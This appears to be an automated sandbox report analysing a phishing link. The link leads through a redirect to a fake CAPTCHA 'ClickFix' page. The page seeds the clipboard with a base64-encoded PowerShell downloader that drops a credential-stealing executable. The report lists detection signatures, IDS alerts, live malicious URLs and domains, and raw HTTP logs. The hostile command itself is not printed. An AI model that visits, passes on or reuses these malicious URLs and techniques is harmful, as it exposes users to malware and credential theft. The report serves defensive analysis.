Windows Analysis Report
https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w

General Information

Sample URL:	https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w
Analysis ID:	1700849
Infos:	yarasigma

Detection

CAPTCHA Scam ClickFix, ReflectiveLoader

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Detect drive by download via clipboard copy & paste

Multi AV Scanner detection for dropped file

Sigma detected: Powershell Decrypt And Execute Base64 Data

Yara detected CAPTCHA Scam ClickFix

Yara detected ReflectiveLoader

AI detected suspicious URL

HTML page adds supicious text to clipboard

Installs a global event hook (focus changed)

Installs a global keyboard hook

Powershell drops PE file

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious PowerShell IEX Execution Patterns

Suspicious powershell command line found

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected suspicious crossdomain redirect

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTML page contains hidden javascript code

HTTP GET or POST without a user agent

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses a Windows Living Off The Land Binaries (LOL bins)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe

ReversingLabs: Detection: 58%

Phishing

Yara detected CAPTCHA Scam ClickFix

Source: Yara match	File source: 3.5.pages.csv, type: HTML
Source: Yara match	File source: 3.4.pages.csv, type: HTML

AI detected suspicious URL

Source: https://google.com@vstrrrlineproperrms.world

Joe Sandbox AI: The URL uses 'google.com' as part of the userinfo section before the '@' symbol, which is a common technique to mislead users into thinking they are visiting a legitimate Google site. The actual domain is 'vstrrrlineproperrms.world', which does not have any clear association with Google. The use of multiple 'r' characters in 'vstrrrlineproperrms' suggests an attempt to create a visually confusing or complex domain name, potentially to obscure its true nature. The '.world' TLD does not inherently suggest a connection to Google, and the overall structure of the URL is likely to confuse users. The similarity score is high due to the presence of 'google.com' in the userinfo section, and the spoofed score is high due to the deceptive structure and potential for user confusion.

HTML page contains hidden javascript code

Source: https://google.com@vstrrrlineproperrms.world/

HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....

Source: https://google.com@vstrrrlineproperrms.world/	HTTP Parser: No favicon
Source: https://google.com@vstrrrlineproperrms.world/	HTTP Parser: No favicon
Source: https://google.com@vstrrrlineproperrms.world/	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.69:443 -> 192.168.2.17:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.86.251.25:443 -> 192.168.2.17:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.17:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.123.129.254:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.113.196.254:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.218.142:443 -> 192.168.2.17:49760 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 6MB later: 36MB

Detected suspicious crossdomain redirect

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: gtoyorupaz.activehosted.com to https://google.com@vstrrrlineproperrms.world
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	HTTP traffic: Redirect from: gtoyorupaz.activehosted.com to https://google.com@vstrrrlineproperrms.world

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: gz
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A41090080B6x-bm-cbt: 1741339336x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66Ex-device-clientsession: C75A5C1ACC1D40039390493A0AF03405x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A41090080B6x-msedge-externalexp: d-thshld42,d-thshld78,d-thshldspcl40,padtmpmsgc,psdupt,sappcsfixt,wsbref-cx-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Timex-userageclass: Unknownaccept-encoding: gz
Source: global traffic	HTTP traffic detected: GET /apic/Qkqxz/EJDGUe HTTP/1.1Host: apioeks.icu

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.17:49760 -> 172.67.218.142:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.17:49760 -> 172.67.218.142:443
Source: Network traffic	Suricata IDS: 1810003 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP PE File Download : 172.67.218.142:443 -> 192.168.2.17:49760
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.17:49760 -> 172.67.218.142:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown	TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown	TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknown	TCP traffic detected without corresponding DNS query: 52.123.128.14

Source: global traffic	HTTP traffic detected: GET /lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w HTTP/1.1host: gtoyorupaz.emlnk9.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w HTTP/1.1host: gtoyorupaz.activehosted.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: vstrrrlineproperrms.worldupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w HTTP/1.1host: gtoyorupaz.activehosted.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9cookie: PHPSESSID=f8ae5b2a52937a4c6818136f9a2e3242cookie: cmp69590582=a312c8b61d00f1f22cb42b63f73c4b5bcookie: __cf_bm=N0zI4h9w5tj.8SUV16EVpu43G44J9Pnjedf_jHmZrHU-1748445004-1.0.1.1-WROsn2BWZZbNLf.I9Z8KFFQ.SWcmg5Jq9lvL2LETKs35L4zoKLl0V1F48STw1FnnHdDq.SaRXZhsG4rCm.l8QqwLR94aRPyMUOj.qIT3MHUpriority: u=0, i
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: vstrrrlineproperrms.worldupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "134.0.6998.36"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=946ead484c10d7ac HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://vstrrrlineproperrms.world/?__cf_chl_rt_tk=rflXDTx6ohFWOxwuiN8wUOfdSEBtnBZRTHGPPyxYKH0-1748445006-1.0.1.1-nnTk7mJONDJ8DM38MiuMNtIyZKGR_cb8D6YhRBO5Txoaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/g/6fab0cec561d/api.js?onload=lwyEv2&render=explicit HTTP/1.1host: challenges.cloudflare.comorigin: https://vstrrrlineproperrms.worldsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q29q0/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/new/normal/auto/ HTTP/1.1host: challenges.cloudflare.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-dest: iframesec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q29q0/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/new/normal/auto/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=946ead535f8e0acd&lang=auto HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q29q0/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/new/normal/auto/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1host: vstrrrlineproperrms.worldsec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://vstrrrlineproperrms.world/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/747131087:1748442686:PYven4mND_i1UNa-m7bkjw5pTkxsvGrXu3q-TSzwl0E/946ead535f8e0acd/LGMd5Us34NgMfu1b5NfwzrK_IU2FZvj0oPLdv.qZrf4-1748445007-1.2.1.1-42v2_eBVXTXi3QvepG3ItADEip9IZcOnfN56jQm181Dw6lI.mA19QXrnKCdhi_5X HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/946ead535f8e0acd/1748445008512/fd0a6019d66b44696008a8f3e4be51aadf8ea3befcb0730b867fb0358b8dd758/QvDtgI8qBI9zHUi HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q29q0/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/new/normal/auto/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/946ead535f8e0acd/1748445008525/lBscEBJNFCEkJGR HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/q29q0/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/new/normal/auto/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/946ead535f8e0acd/1748445008525/lBscEBJNFCEkJGR HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+B9tRCMpyxZbAHy&MD=ALPwh7gA HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/747131087:1748442686:PYven4mND_i1UNa-m7bkjw5pTkxsvGrXu3q-TSzwl0E/946ead535f8e0acd/LGMd5Us34NgMfu1b5NfwzrK_IU2FZvj0oPLdv.qZrf4-1748445007-1.2.1.1-42v2_eBVXTXi3QvepG3ItADEip9IZcOnfN56jQm181Dw6lI.mA19QXrnKCdhi_5X HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
